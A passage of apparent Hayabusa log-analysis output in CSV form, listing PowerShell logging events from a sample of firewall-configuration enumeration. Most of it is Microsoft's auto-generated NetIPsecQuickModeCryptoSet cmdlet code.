value=""Remove-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 